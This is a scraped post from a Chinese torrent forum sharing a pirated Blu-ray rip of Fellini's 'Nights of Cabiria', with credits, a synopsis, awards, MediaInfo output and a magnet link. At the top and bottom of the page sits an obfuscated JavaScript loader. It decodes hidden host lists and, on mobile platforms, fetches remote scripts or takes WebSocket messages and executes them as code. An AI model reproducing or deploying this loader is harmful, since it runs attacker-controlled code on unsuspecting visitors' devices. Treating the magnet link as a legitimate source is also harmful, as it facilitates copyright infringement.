卡比利亚之夜[中文字幕].Le.notti.di.Cabiria.AKA.The.Nights.of.Cabiria.1957.GER.BluRay.1080p.x265.10bit.FLAC.MNHD-bt9527 8.71GB

版主小s 11天前 320

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 卡比利亚之夜 / 花街春梦(港) / 卡比莉亚之夜(台) / 她在黑夜中 / 卡比里亚之夜 / Nights of Cabiria

◎片 名 Le notti di Cabiria

◎年 代 1957

◎产 地 意大利 / 法国

◎类 别 剧情

◎语 言 意大利语

◎上映日期 1957-05-26

◎IMDb链接 https://www.imdb.com/title/tt0050783/

◎豆瓣评分 9.1/10 (30564人评价)

◎豆瓣链接 https://movie.douban.com/subject/1294781/

◎片 长 110分钟

◎导 演 费德里科·费里尼 Federico Fellini (id:1054413)

◎编 剧 费德里科·费里尼 Federico Fellini (id:1054413)

恩尼奥·弗拉亚诺 Ennio Flaiano (id:1033427)

图里奥·皮内利 Tullio Pinelli (id:1010199)

皮埃尔·保罗·帕索里尼 Pier Paolo Pasolini (id:1053619)

◎演 员 朱丽叶塔·马西纳 Giulietta Masina (id:1032361)

弗朗索瓦·佩里埃 Fran?ois Périer (id:1041805)

弗兰卡·马尔齐 Franca Marzi (id:1118144)

多里安·格雷 Dorian Gray (id:1092368)

阿尔多·西尔瓦尼 Aldo Silvani (id:1143287)

恩尼奥·吉罗拉米 Ennio Girolami (id:1094500)

阿梅德奥·纳扎里 Amedeo Nazzari (id:1133169)

詹尼·巴吉诺 Gianni Baghino (id:1060038)

佛朗哥·巴尔杜奇 Franco Balducci (id:1061158)

多米尼克·德卢什 Dominique Delouche (id:1334933)

佛朗哥·法布里齐 Franco Fabrizi (id:1084645)

里卡尔多·费里尼 Riccardo Fellini (id:1086635)

埃利奥·毛罗 Elio Mauro (id:1116065)

尼诺·米拉诺 Nino Milano (id:1121592)

米莫·波利 Mimmo Poli (id:1335898)

波利多尔 Polidor (id:1129336)

尼诺·罗塔 Nino Rota (id:1037013)

◎标 签 意大利 / 费里尼 / 意大利电影 / 爱情 / 费德里科·费里尼 / 1957 / 黑白 / FedericoFellini

◎简 介

妓女卡比利亚(茱莉艾塔·玛西娜 Giulietta Masina 饰)一直梦想和自己的爱人过上甜蜜安稳的日子。然而,单纯善良的她在一开始就被男友骗光了钱,并被推入河中,差点丧命。即使遭遇如此羞辱,她还是对爱情充满希望。一次,她在街上偶遇一个刚和女友吵架的男演员,被他邀请 回家过夜。正当她受宠若惊、满心欢喜之际,男演员的女友上门求和,这让卡比利亚再次伤心欲绝。不久,她又在剧场遭遇到一位英俊男子的疯狂追求,起初她有点不自信,但最终还是接受了这位男子的求婚,并变卖所有家产,准备与未婚夫共赴美好新生活。然而,在途中她的未婚夫居然也露出骗子的本性,抢走了她的钱,并差点害死她。一无所有的卡比利亚疯狂痛哭,悲伤欲绝。她独自晃悠在路上,一群活泼的男女从身边经过,他们快乐地边走边唱,欢乐氛围让灰心的卡比利亚受到感染,她的脸上又露出了招牌式的笑容。

本片获得第30届奥斯...

◎获奖情况 (共4项)

第30届奥斯卡金像奖 (1958)

最佳外语片

第10届戛纳电影节 (1957)

主竞赛单元 金棕榈奖(提名)

└──费德里科·费里尼 (id:1054413)

主竞赛单元 最佳女演员

└──朱丽叶塔·马西纳 (id:1032361)

OCIC Award Special Mention

└──费德里科·费里尼 (id:1054413)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 245702990330665429630441248728335958998 (0xB8D8ACB5E256774540D8077F3946C3D6)

  4. Complete name : Le.notti.di.Cabiria.AKA.The.Nig[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.71 GiB

  8. Duration : 1 h 58 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 10.5 Mb/s

  11. Movie name : The Nights of Cabiria 1957 GER BluRay 1080p - FRDS

  12. Encoded date : UTC 2021-11-20 02:51:05

  13. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 58 min

  22. Bit rate : 9 955 kb/s

  23. Width : 1 480 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 1.370

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.260

  32. Stream size : 8.22 GiB (94%)

  33. Writing library : x265 3.5+19-8003e4382:[Windows][MSVC 1929][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=2 / numa-pools=4 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1480x1080 / interlace=0 / total-frames=170225 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-eob / no-eos / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=100 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / no-hist-scenecut / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=22.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : FLAC

  44. Format/Info : Free Lossless Audio Codec

  45. Codec ID : A_FLAC

  46. Duration : 1 h 58 min

  47. Bit rate mode : Variable

  48. Bit rate : 542 kb/s

  49. Channel(s) : 2 channels

  50. Channel layout : L R

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 11.719 FPS (4096 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossless

  55. Stream size : 458 MiB (5%)

  56. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  57. Language : Italian

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. ID in the original source medium : 4608 (0x1200)

  63. Format : PGS

  64. Muxing mode : zlib

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 56 min

  68. Bit rate : 30.3 kb/s

  69. Count of elements : 2806

  70. Stream size : 25.2 MiB (0%)

  71. Language : German

  72. Default : No

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4609 (0x1201)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 54 min

  83. Bit rate : 25.5 kb/s

  84. Count of elements : 2668

  85. Stream size : 20.9 MiB (0%)

  86. Language : English

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4610 (0x1202)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 3 min

  98. Bit rate : 4 674 b/s

  99. Count of elements : 236

  100. Stream size : 2.13 MiB (0%)

  101. Language : German

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #4

  106. ID : 6

  107. ID in the original source medium : 4611 (0x1203)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 52 min

  113. Bit rate : 29.0 kb/s

  114. Count of elements : 1967

  115. Stream size : 23.4 MiB (0%)

  116. Title : CHS

  117. Language : Chinese

  118. Default : Yes

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Text #5

  122. ID : 7

  123. ID in the original source medium : 4612 (0x1204)

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 52 min

  129. Bit rate : 29.7 kb/s

  130. Count of elements : 1967

  131. Stream size : 23.9 MiB (0%)

  132. Title : CHT

  133. Language : Chinese

  134. Default : Yes

  135. Forced : No

  136. Original source medium : Blu-ray


  137. Menu

  138. 00:00:00.000 : Chapter 01

  139. 00:11:25.541 : Chapter 02

  140. 00:21:32.666 : Chapter 03

  141. 00:33:05.541 : Chapter 04

  142. 00:42:18.375 : Chapter 05

  143. 00:49:38.291 : Chapter 06

  144. 01:01:06.333 : Chapter 07

  145. 01:09:59.000 : Chapter 08

  146. 01:21:34.000 : Chapter 09

  147. 01:30:43.416 : Chapter 10

  148. 01:39:46.083 : Chapter 11

  149. 01:48:44.916 : Chapter 12




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:F7FCF752AA1748943D4FE2FC10EB483E154C09DA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};